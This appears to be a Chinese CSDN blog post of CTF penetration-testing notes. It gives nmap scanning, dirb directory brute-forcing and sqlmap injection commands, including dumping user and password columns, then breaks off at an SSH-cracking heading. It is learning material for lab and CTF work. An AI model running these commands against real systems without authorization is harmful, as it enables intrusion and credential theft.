CTF内网渗透笔记

这篇博客详细介绍了CTF内网渗透过程中涉及的各种工具的使用,包括NMAP扫描、目录爆破、Sqlmap工具、密码爆破、字典生成、子域名收集以及Metasploit的漏洞扫描和利用。内容涵盖了从漏洞挖掘到利用的完整流程,如信息收集、木马植入和内网探测等。
摘要由CSDN通过智能技术生成

一、漏洞挖掘相关工具的使用

NMAP扫描工具使用

1.扫描指定的IP范围

nmap 192.168.0.101-110 

2.扫描指定的IP网段

nmap 192.168.0.* --exclude 192.168.0.100

3.扫描指定网址的操作系统类型(深度扫描)

nmap -A 192.168.0.101

or

nmap -O 192.168.0.101

4.扫描网络内活跃的主机(该命令会跳过端口扫描或检测)

nmap -sP 192.168.0.*

5.快速扫描主机开放的端口(nmap-services文件中的端口)

nmap -F 192.168.0.101

6.扫描特定的端口

nmap -p 80 192.168.0.101
nmap -p 80-160 192.168.0.101 

7.完整的深度扫描

nmap -sP 192.168.0.101/24
nmap -p 1-65535 -A 192.168.0.101

nmap -sS -Pn -T4 -p 1-65535 192.168.0.101
nmap -A -O -p 80 192.168.0.101

目录爆破工具的使用

1.Windows平台-使用御剑,下载地址

https://github.com/foryujian/yjdirscan

2.Linux平台-使用kali中的Dirb,命令:

dirb http://192.168.1.101 /usr/share/wordlists/dirb/big.txt 

kali自带图形化工具owasp-zap,命令:

root@kali:~# owasp-zap 

Sqlmap工具的使用

1.查找数据库

sqlmap -u "http://www.xxx.com/link.php?id=321" --dbs

2.查找表

sqlmap -u "http://www.xxx.com/link.php?id=321" -D dataname --tables

3.查找列

sqlmap -u "http://www.xxx.com/link.php?id=321" -D dataname -T table_name --columns

4.查找字段值

sqlmap -u "http://www.xxx.com/link.php?id=321" -D dataname -T table_name -C "id,user,password" --dump

5.通过POST方式注入

sqlmap -u "http://www.xxx.com/login.asp" --data "Username=admin&Password=123456"

6.Sqlmap组合命令的使用

sqlmap -u “http://www.xxx.com” --data "Username=amdin&Password=123" --level 3 --dbms mysql

#暴力扫描
sqlmap -u “http://www.xxx.com” --level 5 --risk 3 --forms --dbs

密码爆破工具的使用

Windows平台使用Archpr

Kali Linux使用hydra

#Kali中自带字典位置
cd /usr/share/wordlist

#破解SSH
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值